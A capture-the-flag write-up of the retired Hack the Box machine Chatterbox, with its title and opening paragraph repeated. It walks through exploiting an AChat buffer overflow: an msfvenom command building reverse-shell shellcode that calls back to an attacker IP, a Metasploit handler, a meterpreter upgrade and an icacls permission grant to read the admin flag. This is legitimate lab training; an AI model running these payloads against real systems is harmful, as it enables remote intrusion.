Hack the Box Writeup - Chatterbox

In this writeup we look at the retired Hack the Box machine, Chatterbox. This is a pretty unstable box with many filtered ports, so the nmap scan needs a little tweak otherwise it will take hours to complete and the shell choice needs to be carefully made.

Hack the Box Writeup - Chatterbox

In this writeup we look at the retired Hack the Box machine, Chatterbox. This is a pretty unstable box with many filtered ports, so the nmap scan needs a little tweak otherwise it will take hours to complete and the shell choice needs to be carefully made.

Enumeration

In order to get the scan to complete some time this century we need to add the -T5 flag to speed it up some.

$ nmap -sC -sV -p- -T5 -oA nmap/scan 10.10.10.74

Shows some interesting high number ports which are identified as running a program called ACHAT.

Hitting up searchploit for the term achat immediately finds a bufferoverflow exploit for it; a python version and a ruby version. Copy the python version locally and take a look at it. Looking in the source comments shows that there is an awful lot of bad characters so finding a working encoded shell could be difficult. After lots of trial and error we find that a generic reverse_tcp_allports shell works best which we can later upgrade to a meterpreter one.

Exploit

We generate our shellcode with the following:

$ msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp_allports LPORT=4444 LHOST=10.10.14.15 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

Copy and paste the shellcode into the python exploit, and don't forget to modify the target IP address as well.

Now prepare the metasploit multihandler to receive our basic shell.

$ msfconsole
> use exploit/multi/handler
> set payload windows/shell/reverse_tcp_allports
> set lhost 10.10.14.15
> set lport 4444
> exploit

Then we run our exploit in another terminal.

$ python ./achat.py
--->{P00F}!

All being well you should now see the connection in the multi handler. Hit CTRL-Z to background the task and lets upgrade the shell to a meterpreter one.

> use post/multi/manage/shell_to_meterpreter
> set session 1
> set lhost 10.10.14.15
> set lport 8888
> exploit

When that finishes we should have a new meterpreter based session, so switch over to it.

> sessions -i 2
> shell

That drops us onto the system where we can get the user flag.

Now, onto the root flag. We seem to be able to navigate into the Administrators folders without any issue, but trying to view the root.txt tells us permission is denied.

Let's take a look at the permissions.

C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop
cacls C:\Users\Administrator
C:\Users\Administrator NT AUTHORITY\SYSTEM:(OI)(CI)F 
                       CHATTERBOX\Administrator:(OI)(CI)F 
                       BUILTIN\Administrators:(OI)(CI)F 
                       CHATTERBOX\Alfred:(OI)(CI)F 

So it looks like our user account has sufficient user privileges to modify the permissions of all files and directories under the Administrator directory. Fortunately Windows 7 has a command line tool for changing these file permissions.

C:\Users\Administrator\Desktop>ICACLS root.txt /grant "Users":F
ICACLS root.txt /grant "Users":F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files

Now we can view that last flag, and we're done.